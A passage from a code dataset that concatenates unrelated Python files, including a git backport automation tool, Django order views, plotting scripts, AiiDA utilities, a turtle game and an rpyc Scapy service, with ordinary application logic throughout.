os.path.join(os.path.normpath(self.base_folder), repository['name'])\n if os.path.exists(repo_path):\n repo = g.Repo.init(repo_path)\n else:\n self.gui.log_error(\"Couldn't find repository in \" + repo_path)\n continue\n\n # Create SP branch.\n git = repo.git\n base_version_branch = self.service_pack.split('-')[1].split(' ')[0]\n sp_version_branch = self.service_pack.split(' ')[1].replace('(', '').replace(')', '')\n git.fetch('--all')\n try:\n # Make sure we don't have a SP branch on origin.\n git.push(\"origin\", '--delete', sp_key)\n except g.GitCommandError:\n pass\n finally:\n try:\n # Checkout to version branch.\n git.checkout(base_version_branch)\n except g.GitCommandError as gce:\n git.checkout('-b', base_version_branch, 'origin/' + 
base_version_branch)\n # Pull all version branch changes.\n git.pull('upstream', base_version_branch)\n\n try:\n # Make sure we don't have a SP branch locally.\n git.branch(\"-D\", sp_key)\n except g.GitCommandError:\n pass\n finally:\n git.checkout('-b', sp_key)\n\n # List of commits to be cherry-picked.\n commits = repository['commits']\n urls = []\n # Order commits by date, so we maintain the chronology of events.\n commits.sort(key=sort_by_timestamp)\n commit_message = '[' + sp_key + '] ' + self.jira_connection.issue(sp_key).fields.summary\n\n # Go through all commits.\n for commit in commits:\n # Don't cherry-pick merge PR commits.\n if not commit['message'].startswith(\"Merge pull request\"):\n # Cherry-pick base case commits.\n sha = commit['id']\n urls.append(commit['url'])\n self.gui.log_info(\"Cherry-picking \" + sha + \".\")\n try:\n git.cherry_pick(sha)\n except g.GitCommandError as gce:\n # Flag that we have merge conflicts, so we can signalize that on the jira comment later.\n has_merge_conflicts = True\n self.gui.log_error(\"Unable to cherry-pick '\" + sha + \"': \" + gce.stderr.strip())\n # Delete changes.\n git.reset('--hard')\n break\n # Rename commits with backport message.\n git.commit('--amend', '-m', commit_message)\n\n # Proceed with the backport, if we don't have conflicts\n base_pr = version_pr = None\n if has_merge_conflicts is False:\n try:\n # Push changes.\n self.gui.log_info(\"Pushing commits to \" + sp_key + \" branch.\")\n git.push(\"origin\", sp_key)\n except g.GitCommandError as gce:\n self.gui.log_error(\"Unable to push changes to origin \" + sp_key + \" branch: \" + gce.stderr.strip())\n git.checkout('master')\n git.branch(\"-D\", sp_key)\n self.gui.log_info(\"Done with \" + repository['name'] + \"!\")\n\n # Build PR message.\n self.master1 = self.gui.master1_input.get()\n self.master2 = self.gui.master2_input.get()\n pr_message = \"**Attention: This is the outcome of an automated process!**\"\n pr_message += \"\\nMerge Masters: \" + self.master1 + \" and \" + self.master2 + \"\\n\"\n pr_message += \"Cherry-picks:\\n\"\n for url in urls:\n pr_message += \"* \" + url + \"\\n\"\n\n # Build and send Pull Request.\n self.gui.log_info(\"Opening PRs for \" + sp_key + \".\")\n upstream_repo = me.get_repo(repository['name']).parent\n\n # For version branch\n try:\n upstream_repo.get_branch(base_version_branch)\n base_pr = upstream_repo.create_pull(commit_message, pr_message, base_version_branch,\n '{}:{}'.format(self.github_username, sp_key), True)\n except GithubException as ge:\n if ge.status == 422:\n self.gui.log_error(\n \"Unable to submit PR for \" + sp_key + \" in \" + base_version_branch + \" branch: \" +\n ge.data['errors'][0]['message'])\n else:\n self.gui.log_error(\n \"Unable to submit PR for \" + sp_key + \" in \" + base_version_branch + \" branch: \" +\n ge.data['message'])\n else:\n self.gui.log_info(\"Opened Pull Request in \" + base_version_branch + \" branch\")\n\n # For SP branch\n try:\n upstream_repo.get_branch(sp_version_branch)\n version_pr = upstream_repo.create_pull(commit_message, pr_message, sp_version_branch,\n '{}:{}'.format(self.github_username, sp_key), True)\n except GithubException as ge:\n if ge.status == 422:\n self.gui.log_error(\n \"Unable to submit PR for \" + sp_key + \" in \" + sp_version_branch + \" branch: \" +\n ge.data['errors'][0]['message'])\n else:\n self.gui.log_warn(\n \"Unable to submit PR for \" + sp_key + \" in \" + sp_version_branch + \" branch: \" +\n ge.data['message'])\n else:\n self.gui.log_info(\"Opened 
Pull Request in \" + sp_version_branch + \" branch\")\n\n # Delete branch and Move to next repository.\n self.gui.log_info(\"Deleting \" + sp_key + \" branch...\")\n git.checkout('master')\n git.branch(\"-D\", sp_key)\n self.gui.log_info(\"Done with \" + repository['name'] + \"!\")\n\n # Add PR links in the JIRA case\n self.gui.log_info(\"Adding PR links in \" + sp_key + \"...\")\n jira_comment += \"\\n* \" + repository['name'] + \":\"\n if base_pr:\n jira_comment += \"\\n** \" + base_version_branch + \": \" + base_pr.html_url\n elif has_merge_conflicts:\n jira_comment += \" There are conflicts that need to be manually treated.\"\n if version_pr:\n jira_comment += \"\\n** \" + sp_version_branch + \": \" + version_pr.html_url\n\n # Add pull-request-sent label\n issue.fields.labels.append(u\"pull-request-sent\")\n issue.update(fields={\"labels\": issue.fields.labels})\n\n # Move issue to block status\n self.jira_connection.transition_issue(sp_key, '61', comment=jira_comment)\n\n # Move to next SP case.\n self.gui.log_info(\"Done with \" + sp_key + \"!\")\n\n\ndef sort_by_timestamp(val):\n return val['authorTimestamp']\n\n\n# Start application\nMainController()\n","repo_name":"hv-leo/CherryPicker","sub_path":"MainController.py","file_name":"MainController.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42892860954","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef auto_save_metric_plots(df, time_step, rolling_over,lr,opt,seed):\n for i in range(len(df)):\n df[i] = df[i].apply(pd.to_numeric, errors='coerce')\n df[i] = df[i].fillna(0)\n ROLLING_OVER = rolling_over # per week\n\n # time=df['time'].max()/ROLLING_OVER\n time = min([d['time'].max() for d in df]) / 60\n tmin=0\n tmax=16\n # time = 100 * 6\n # df_pass[df_pass[[\"num_matches\", \"pass_arrivals\", \"longwait_pass\", \"served_pass\"]]<-1000]=0\n\n labels=[]\n\n\n colors=[]\n for l,o,s in zip(lr,opt,seed):\n print(l,o)\n if o>0:\n if abs(s-12000)<100:\n labels.append('inf')\n colors.append('g')\n elif s//1000>=10:\n labels.append('DRDQN-{}'.format(o))\n colors.append('r')\n elif s//1000==25:\n labels.append('1-DRDQN-{}'.format(o))\n colors.append('k')\n elif s//1000==22:\n labels.append('SDRDQN-{}'.format(o))\n colors.append('g')\n else:\n labels.append('0 option')\n colors.append('b')\n diff_label=['total_reward']#['average_idle_time']\n [d.rename(columns={'average_idle_time':'total_reward'},inplace=True) for d in df]\n for d in df:\n d['removed_pass']+=d['served_pass']\n plot_labels=['num_idle','longwait_pass','num_serving','num_assigned','num_cruising','total_reward','removed_pass','num_matches']\n fig, axes = plt.subplots(nrows=len(plot_labels), ncols=1, figsize=(10, 6*len(plot_labels)))\n axe = axes.ravel()\n\n\n for d,label,color in zip(df,labels,colors):\n ax_id = 0\n for id, col in enumerate(d.columns.tolist()[1:]):\n # v=moving_average(d[\"%s\" % col],rolling_over)\n if col in diff_label:\n diff_v=diff_value(d[\"%s\" % col].to_numpy(),1440)\n diff_v= diff_v [:tmax*rolling_over]\n v=group_average(diff_v,rolling_over)\n elif col in plot_labels:\n v=group_average(d[\"%s\" % col].to_numpy()[:tmax*rolling_over],rolling_over)\n else:\n continue\n\n v,upper,lower=moving_average(v,1)\n axe[ax_id].plot(v,'-.*', label=label,lw=0.5,ms=2,color=color)\n axe[ax_id].fill_between(np.arange(len(v)), lower, upper ,alpha=.1)\n #d[\"%s\" % 
col].rolling(window=rolling_over).mean()[:-1].plot(ax=axe[ax_id], style='-.', label=label)\n # d[\"%s\" % col].groupby(d.index // ROLLING_OVER).mean()[:-1].plot(ax=axe[ax_id], style='-.', label=label)\n axe[ax_id].set_ylabel(col)\n axe[ax_id].set_title(col)\n axe[ax_id].set_xlabel('Episode')\n axe[ax_id].set_xlim([tmin-1, tmax+1])\n axe[ax_id].legend(loc=0, prop={'size': 6})\n ax_id+=1\n\n # train_df = pd.DataFrame(train_name)\n\n plt.savefig('cnn_results.pdf')\n\n\ndef moving_average(x, w):\n #return np.convolve(x, np.ones(w), 'valid') / w\n return np.array([np.mean(x[i:i+w]) for i in range(len(x))]),np.array([np.percentile(x[i:i+w],75) for i in range(len(x))]),np.array([np.percentile(x[i:i+w],25) for i in range(len(x))])\n\ndef group_average(x,w):\n # return np.array([np.mean(x[i + w-1]) for i in range(0, len(x)-w, w)])\n return np.array([np.mean(x[i:i+w]) for i in range(0,len(x)-w,w)])\n\ndef diff_value(x,epi_len):\n vals=[]\n for i in range(0,len(x),epi_len):\n v=np.diff(x[i:i+epi_len])\n v=[0]+list(v)\n vals+=v\n\n return vals\n\nif __name__ == \"__main__\":\n df=[]\n\n # options=[1]\n # lr='0.0001'\n # df=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n\n # options=[3]\n # lr='0.001'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n #\n # options=[0]\n # lr='0.001'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n \n # # options=[1]\n # # lr='0.00012'\n # # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n # options=[0]\n # lr='0.0012'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n\n # options=[1]\n # lr='0.0011'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n #\n # options=[0]\n # lr='0.000149'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n\n\n tseed=[12200,12201,12000,12001,12002,12003,12004]#,12002,12003,12004,12000]\n tlearning_rate=['0.005' for _ in range(len(tseed))]\n toptions=[3 for _ in range(len(tseed))]\n # tseed=[12100,11201,19600]#,12002,12003,12004,12000]\n # tlearning_rate=['0.005' for _ in range(len(tseed))]\n # toptions=[3,0,3]\n\n # tseed1=[800+i for i in range(3)]\n # learning_rate+=['0.001' for _ in range(len(tseed1))]\n # options+=[3 for _ in range(len(tseed1))]\n #\n # # seed+=tseed\n # seed+=tseed1New Folder\n\n\n options=[];seed=[];learning_rate=[]\n for option,lr,s in zip(toptions,tlearning_rate,tseed):\n try:\n print(option,lr,s)\n df+=[pd.read_csv('../logs/test_results/parsed_results_{}_{}_nc_{}.csv'.format(option,lr,s))]\n options.append(option)\n learning_rate.append(lr)\n seed.append(s)\n except:\n continue\n\n\n # learning_rate+=['0.000145','0.000145']\n # options+=[1]\n #\n # for option,lr in zip(options,learning_rate):\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(option,lr))]\n\n # #\n # options=[1]\n # lr='0.00015'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n # #\n auto_save_metric_plots(df, 1, 1440,learning_rate,options,seed)\n","repo_name":"sguo28/DROP_Simulator","sub_path":"code/tools/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"22416648205","text":"from django.http import JsonResponse\nfrom django.shortcuts import render, 
redirect\nfrom carts.models import Cart, CartItem\nfrom accounts.models import ShippingAddress\nfrom .models import Order, OrderItem, Payment\nfrom django.contrib.auth.decorators import login_required\nimport json\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.template.loader import render_to_string\nfrom carts.views import getCurrentCart\nfrom django.core.mail import EmailMessage\n# Create your views here.\n\ndef payment(request):\n \n user = request.user\n body = json.loads(request.body)\n order = Order.objects.get(user=user, is_ordered=False, order_number=body['orderID'] )\n \n #store transcations data inside payment model\n\n payment = Payment(\n user = user,\n payment_id=body['transID'],\n payment_method = body['payment_method'],\n amount = order.order_total,\n status = body['status'],\n )\n payment.save()\n order.payment = payment\n order.is_ordered = True\n order.save()\n \n for item in OrderItem.objects.all().filter(order=order):\n item.ordered = True\n item.save()\n\n #reduce stock\n\n #clear cart\n cart = getCurrentCart(request)\n CartItem.objects.filter(cart=cart).delete()\n \n #successful purchase email\n email = user.email\n current_site = get_current_site(request)\n mail_subject = \"Thank you for your purchase. Your order has been completed.\"\n message = render_to_string(\"orders/order_received_email.html\", {\n 'user':user,\n 'domain':current_site,\n 'order': order,\n })\n send_email = EmailMessage(subject=mail_subject,body=message,to=[email])\n send_email.send()\n \n data = {\n 'order_number': order.order_number,\n 'transID': payment.payment_id,\n }\n\n return JsonResponse(data)\n\n@login_required(login_url='login')\ndef place_order(request, order):\n\n cart_id,shipping_address_id = order.split('-')\n order_user = request.user\n order_cart = Cart.objects.get(id=cart_id)\n order_shipping_address = ShippingAddress.objects.get(id=shipping_address_id)\n new_order = Order(\n user = order_user,\n shipping_address=order_shipping_address,\n order_total=0, \n )\n new_order.save()\n new_order.generate_order_number()\n \n cart_items = CartItem.objects.all().filter(cart=order_cart)\n total = 0\n\n for item in cart_items:\n total += item.product.price*item.quantity\n\n order_item = OrderItem(\n order = new_order,\n product = item.product,\n quantity = item.quantity,\n color = item.color,\n size = item.size,\n condition = item.condition,\n )\n order_item.save()\n \n new_order.order_total = total\n new_order.save()\n \n order_items = OrderItem.objects.all().filter(order=new_order)\n context = {\n 'order':new_order,\n 'order_items': order_items,\n }\n return render(request, 'orders/payment.html', context)\n\ndef order_complete(request):\n\n order_number = request.GET.get('order_number')\n transID = request.GET.get('payment_id')\n\n try:\n order = Order.objects.get(order_number = order_number, is_ordered=True)\n order_items = OrderItem.objects.filter(order_id=order.id)\n payment = Payment.objects.get(payment_id=transID)\n shipping_address = order.shipping_address\n context = {\n 'order':order,\n 'order_items': order_items,\n 'payment': payment,\n 'shipping_address': shipping_address,\n }\n \n return render(request, 'orders/order_complete.html', context)\n\n except (Payment.DoesNotExist, Order.DoesNotExist):\n return redirect('home')","repo_name":"HerbCyor/ecommerce-example","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} 
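The `payment()` view in the orders record just above marks each `OrderItem` as ordered and clears the cart, but leaves its `#reduce stock` step as a bare comment. A minimal sketch of that step, assuming a `Product` model with an integer `stock` field (the `store.models` import path, the field name, and the `reduce_stock` helper are illustrative assumptions, not code from the original repository):

    from django.db.models import F
    from store.models import Product  # assumed location of the Product model
    from .models import OrderItem

    def reduce_stock(order):
        # Push the decrement into SQL with F() so two concurrent payments
        # cannot read-modify-write the same row and oversell an item;
        # rows whose remaining stock is insufficient are left untouched.
        for item in OrderItem.objects.filter(order=order):
            Product.objects.filter(
                pk=item.product_id, stock__gte=item.quantity
            ).update(stock=F("stock") - item.quantity)

Because of the `stock__gte` filter the update is a no-op when stock would go negative; a caller can detect that case by checking the row count that `update()` returns.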
+{"seq_id":"36271729971","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\ndef readme():\n with open('README.md') as f:\n README = f.read()\n return README\n\nVERSION = '1.0.4'\nDESCRIPTION = '🔍 Experimental DataFrame, statistics and analysis library for Python'\n\nsetup(\n name=\"ickle\",\n version=VERSION,\n author=\"Karishma Shukla\",\n author_email=\"karishmashuklaa@gmail.com\",\n url=\"https://github.com/karishmashuklaa/ickle\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description= readme(),\n packages=find_packages(),\n install_requires=['numpy', 'pytest'],\n keywords=['data-analysis', 'numpy', 'data', 'python', 'library', 'pandas', 'ickle', 'datascience'],\n license=\"MIT\",\n classifiers=[\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)","repo_name":"karishmashuklaa/ickle","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"51"} +{"seq_id":"73185571039","text":"import matplotlib.pyplot as plt\n\n# Define the parameter sizes and corresponding inference speeds\nparameter_sizes40x30 = [15083, 19539, 25235, 39843]\nparameter_sizes80x60 = [24407, 77139, 82835]\ninference_speeds40x30 = [700, 770, 910, 1200]\ninference_speeds80x60 = [1550, 2750, 2870]\n\n# Create a figure and axis\nfig, ax = plt.subplots(figsize=(10,5))\n\n\nplt.title('Inference speed vs Model size')\n# Plot the data\nax.plot(parameter_sizes40x30, inference_speeds40x30, label=\"Model_40x30\", marker=\"o\", linestyle='dashed')\nax.plot(parameter_sizes80x60, inference_speeds80x60, label=\"Model_80x60\", marker=\"o\", linestyle='dashed')\nax.grid(True)\n# Set the x and y axis labels\nax.set_xlabel('Parameter size')\nax.set_ylabel(u'Inference speed (\\u03bcs)')\nax.legend()\n\n\n# Show the plot\nplt.savefig(f'figure/Training/inferenceVsParams.svg')\nplt.show()\n","repo_name":"ntnu-arl/trace_paw","sub_path":"NeuralNetwork/plot_size_inference.py","file_name":"plot_size_inference.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"51"} +{"seq_id":"21499317863","text":"from django.shortcuts import render\nfrom .forms import PostForm\n\n\n# Create your views here.\ndef create_post(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n form.save()\n \n \n else:\n form = PostForm()\n\n return render(request,'create_post.html',{'form':form})\n\n\n\n\n \n","repo_name":"Mehyar-Farzat/Django-Blog2","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70579217438","text":"from aiida import orm\nfrom aiida.orm.utils import load_node\nfrom aiida.cmdline.utils.common import get_workchain_report\n\ndef report_exception(node, tab=''):\n print(tab + '{}'.format(('\\n' + tab + '- ').join(str(node.exception).split('\\n'))))\n\ndef report_failed(node, tab='', actions={}):\n ptr = failed_node = node\n while True:\n print(tab + '- {}<{}>: [{}] {}'.format(ptr.process_class.__name__, ptr.pk, ptr.exit_status, ptr.exit_message))\n if ptr.is_excepted:\n report_exception(ptr, tab=tab + ' ')\n if ptr.exit_status:\n 
failed_node = ptr\n        try:\n            ptr = ptr.called[0]\n        except:\n            break\n\n
    print(tab + 'Failed on {}'.format(failed_node.process_class.__name__))\n\n
    for typ, act in actions.items():\n        if failed_node.process_class == typ:\n            return act(failed_node)\n\n
def report_running(node):\n    print(get_workchain_report(node, 'REPORT'))\n\n
    desc = list(node.called_descendants)\n    if not len(desc):\n        print('_____________________________________ NO CALLED DESC')\n        return\n
    desc.sort(key=lambda x: x.pk)\n    last = desc[-1]\n\n
    if not isinstance(last, orm.CalcJobNode):\n        print('_____________________________________ NO CALCJOB')\n        return\n\n
    try:\n        remote = last.outputs.remote_folder\n    except:\n        print('_____________________________________ NO REMOTE YET!!!')\n        return\n\n
    pc = last.process_class\n    files = remote.listdir()\n\n
    if pc._DEFAULT_OUTPUT_FILE not in files:\n        print('_____________________________________ IN QUEUE')\n    else:\n        print('_____________________________________ RUNNING')\n\n
def validate_node(node):\n    if isinstance(node, int):\n        res = load_node(node)\n    elif isinstance(node, orm.Node):\n        res = node\n    else:\n        raise ValueError('`pk` must be either an aiida.orm.Node or a pk to a node')\n\n    return res","repo_name":"Crivella/mypyutils","sub_path":"src/mypyutils/aiida/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25286122316","text":"import sys\nimport os \nfrom parser.tcx import getMarker\nfrom classes.tcxclasses import Course\n\ncourse = Course();\n\n
#read\nwith open(sys.argv[1], \"r\") as file_input:\n    for line in file_input:\n        marker = str(getMarker(line))\n        if( marker != \"\" ):\n            course.update(marker, line)\n\n
course.finish();\n\nis_header = True;\n\nlap_count = 0;\nlap = course.getLap(0)\n\ntp_count = -1;\ntp = 0;\n\n
#write\npath = sys.argv[1]\npath = os.path.normpath(path)\ntokens = path.split(os.sep)\ntokens[-1] = \"fixed_\"+tokens[-1]\ntokens[0] = \"/\"+tokens[0]\npath = os.path.join(*tokens)\n\n
with open(sys.argv[1], \"r\") as file_input:\n    with open(path, \"w\") as file_output:\n        for line in file_input: \n            if is_header :\n                if line.lstrip().startswith(\"\"):\n                    is_header = False\n                    tp_count = tp_count + 1\n                    tp = lap.getTrackPoint(tp_count);\n\n
                if line.lstrip().startswith(\"\"):\n                    line = \"\\t\\t\\t\\t\"+str(lap.tot_dist)+\"\\n\"\n                \n                if line.lstrip().startswith(\"\"):\n                    line = \"\\t\\t\\t\\t\"+str(lap.max_speed)+\"\\n\"\n                \n
            else:\n                if line.lstrip().startswith(\"\"):\n                    tp_count = tp_count + 1\n                    tp = lap.getTrackPoint(tp_count);\n\n
                if line.lstrip().startswith(\"\"): #TrackPoint\n                    course.dist += tp.speed\n                    line = \"\\t\\t\\t\\t\\t\\t\"+str(course.dist)+\"\\n\"\n                \n                if line.lstrip().startswith(\"\"):\n                    line = \"\\t\\t\\t\\t\\t\\t\\t\"+str(tp.speed)+\"\\n\"\n                \n                if line.lstrip().startswith(\"\"):\n                    line = \"\\t\\t\\t\\t\\t\\t\"+str(lap.avg_speed)+\"\\n\"\n                \n                file_output.write(line)\n","repo_name":"bonomip/suito-speed-fix","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13963377014","text":"import copy\nfrom collections import deque\n\nN = int(input())\n\ngraph = [[] for _ in range(N+1)] # graph[x] lists the courses that have course x as a prerequisite\n\n
# set up the in-degree (number of unfinished prerequisites) of every course\nindegree = [0] * (N+1)\n\ntime = [0] * (N+1)\n\n
for i in range(1, N+1):\n    data = list(map(int, input().split())) # each input line ends with a -1 sentinel, so it is sliced off below\n    time[i] = data[0] # the first value on the line is the duration of course i itself\n\n    
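# the remaining values on the line (the trailing -1 sentinel is sliced off) are prerequisite course numbers\n    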
for x in data[1:-1]:\n        indegree[i] += 1\n        graph[x].append(i)\n\n
def topology_sort():\n    result = copy.deepcopy(time)\n    q = deque()\n\n
    for i in range(1, N+1):\n        if indegree[i] == 0:\n            q.append(i)\n\n
    while q:\n        now = q.popleft()\n\n        for i in graph[now]:\n            result[i] = max(result[i], result[now] + time[i])\n            indegree[i] -= 1\n\n            if indegree[i] == 0:\n                q.append(i)\n\n\n
    for i in range(1, N+1):\n        print(result[i])\n\ntopology_sort()\n\n\n\n\n","repo_name":"TannerKi1/Python_Practice","sub_path":"Daily Algorithm/22.08/220812/DBB_303_커리큘럼_위상정렬.py","file_name":"DBB_303_커리큘럼_위상정렬.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16880647040","text":"'''\n1. Random appearance of the shape on different parts of the screen\n2. The event of a shape being clicked\n3. The score updating\n4. The timer updating\n'''\n# a121_catch_a_turtle.py\n#-----import statements-----\nimport turtle as trtl\nimport random as rand\n\n
#-----game configuration----\nxMin = 0\nxMax = 112\nyMin = 0\nyMax = 324\nscore = 0\ntimer = 5\n\ntimerUp = False\ncounterinterval = 1000\nfontsetup = (\"Arial\", 20, \"normal\")\ncolor = \"blue\"\nshape = \"triangle\"\n\n
#-----initialize turtle-----\nt = trtl.Turtle()\nt.shape(shape)\nt.fillcolor(color)\nt.penup()\nt.hideturtle()\n\n
gamestart = trtl.Turtle()\ngamestart.penup()\ngamestart.goto(300, -300)\ngamestart.write(\"Press to begin!\", font=fontsetup)\n\n
scorewriter = trtl.Turtle()\nscorewriter.penup()\nscorewriter.goto(300, -300)\nscorewriter.hideturtle()\n\n
counter = trtl.Turtle()\ncounter.penup()\ncounter.goto(-300, -300)\ncounter.hideturtle()\n\n
#-----game functions--------\ndef spot_clicked(x, y):\n    t.goto(rand.randint(xMin, xMax), rand.randint(yMin, yMax))\n    scorechange()\n    addcolor()\n    size()\n\n
def addcolor():\n    colorlist = [\"Red\", \"Yellow\", \"Green\", \"Blue\", \"Orange\"]\n    t.fillcolor(rand.choice(colorlist))\n    t.stamp()\n    t.fillcolor(color)\n\n
def size():\n    sizechange = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n    t.turtlesize(rand.choice(sizechange))\n\n
def scorechange():\n    global score\n    score += 1\n    scorewriter.clear()\n    scorewriter.write(score, font=fontsetup)\n\n
def start_game(x, y):\n    t.showturtle()\n    countdown()\n    gamestart.clear()\n\n
def countdown():\n    global timer, timerUp\n    counter.clear()\n    if timer <= 0:\n        timer -= 1\n        counter.write(\"Time Is Up!\", font=fontsetup)\n        timerUp = True\n    else:\n        counter.write(\"timer: \" + str(timer), font=fontsetup)\n        timer -= 1\n        counter.getscreen().ontimer(countdown, counterinterval)\n
#-----events----------------\ngamestart.onclick(start_game)\nt.onclick(spot_clicked)\n\nwn = trtl.Screen()\nwn.bgcolor(\"purple\")\nwn.mainloop()","repo_name":"mrogers02/1-2-1Activity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"25851501179","text":"import contextlib\n\nimport flask\n\nfrom decapod_api import auth\nfrom decapod_api import exceptions as http_exceptions\nfrom decapod_common import exceptions as base_exceptions\nfrom decapod_common import log\nfrom decapod_common.models import execution\nfrom decapod_common.models import playbook_configuration\nfrom decapod_common.models import task\n\n\n
LOG = log.getLogger(__name__)\n\"\"\"Logger.\"\"\"\n\n\n
@contextlib.contextmanager\ndef created_playbook_configuration_model(\n        name, playbook_id, cluster_model, servers, initiator_id, hints, *,\n        delete_on_fail=False):\n    try:\n        
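# model creation can fail on a duplicate name or an undeployed cluster; both cases are translated into API errors below\n        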
pcmodel = playbook_configuration.PlaybookConfigurationModel.create(\n            name=name,\n            playbook_id=playbook_id,\n            cluster=cluster_model,\n            servers=servers,\n            initiator_id=initiator_id,\n            hints=hints\n        )\n
    except base_exceptions.UniqueConstraintViolationError as exc:\n        LOG.warning(\n            \"Cannot create cluster %s (unique constraint \"\n            \"violation)\", name)\n        raise http_exceptions.ImpossibleToCreateSuchModel() from exc\n
    except base_exceptions.ClusterMustBeDeployedError as exc:\n        mid = cluster_model.model_id\n        LOG.warning(\n            \"Attempt to create playbook configuration for not \"\n            \"deployed cluster %s\", mid)\n        raise http_exceptions.ClusterMustBeDeployedError(mid) from exc\n\n
    LOG.info(\"Playbook configuration %s (%s) created by %s\",\n             name, pcmodel.model_id, initiator_id)\n\n
    try:\n        yield pcmodel\n    except Exception as exc:\n        if delete_on_fail:\n            LOG.warning(\"Caught exception %s, delete playbook config %s\",\n                        exc, pcmodel.model_id)\n            pcmodel.delete()\n        raise\n\n\n
@contextlib.contextmanager\ndef created_execution_model(pcmodel, initiator_id, *, delete_on_fail=True):\n    auth.AUTH.check_auth_permission(flask.g.token.user,\n                                    \"playbook\", pcmodel.playbook_id)\n    if pcmodel.cluster.time_deleted:\n        raise http_exceptions.CannotExecuteOnDeletedCluster(\n            pcmodel.cluster_id)\n\n
    model = execution.ExecutionModel.create(pcmodel, initiator_id)\n    LOG.info(\n        \"Created execution %s for playbook configuration %s of \"\n        \"version %s\",\n        model.model_id, pcmodel.model_id, pcmodel.version\n    )\n
    try:\n        with created_task(pcmodel, model) as tsk:\n            LOG.info(\"Created task for execution %s: %s\",\n                     model.model_id, tsk._id)\n            yield model\n
    except Exception as exc:\n        LOG.error(\"Cannot create task for execution %s: %s\",\n                  model.model_id, exc)\n        if delete_on_fail:\n            model.state = execution.ExecutionState.failed\n            model.save()\n\n        raise\n\n\n
@contextlib.contextmanager\ndef created_task(pcmodel, execution_model):\n    tsk = task.PlaybookPluginTask(\n        pcmodel.playbook_id, pcmodel._id, execution_model.model_id\n    )\n    tsk.create()\n\n    yield tsk\n","repo_name":"Mirantis/ceph-lcm","sub_path":"backend/api/decapod_api/views/v1/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"51"} +{"seq_id":"3908251164","text":"import sys\nimport logging\nimport warnings\nfrom signal import signal, SIGINT\n\nimport rpyc\nfrom rpyc.utils.server import ThreadedServer\nfrom server import ScapyServer\n\n
warnings.filterwarnings(\"ignore\", \"BaseException.message\")\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\ndata = {}\n\n\n
class ScapyService(rpyc.Service, ScapyServer):\n    def on_connect(self, conn):\n        print(\"connected\")\n        conn._config.update(dict(\n            allow_all_attrs=True,\n            allow_public_attrs=True,\n            allow_pickle=True,\n            allow_getattr=True,\n            allow_setattr=True,\n            allow_delattr=True,\n            import_custom_exceptions=False,\n            propagate_SystemExit_locally=True,\n            propagate_KeyboardInterrupt_locally=True,\n            instantiate_custom_exceptions=True,\n            instantiate_oldstyle_exceptions=True,\n        ))\n\n
    def on_disconnect(self, conn):\n        print(\"disconnected\")\n\n\n
def main():\n    data[\"scapyServiceObj\"] = ScapyService()\n\n
    def handler(signal_received, frame):\n        # Handle any cleanup here\n        # pop() both fetches and removes the entry, so a separate del would raise KeyError\n        data.pop(\"scapyServiceObj\", None)\n        print('SIGINT or CTRL-C detected. 
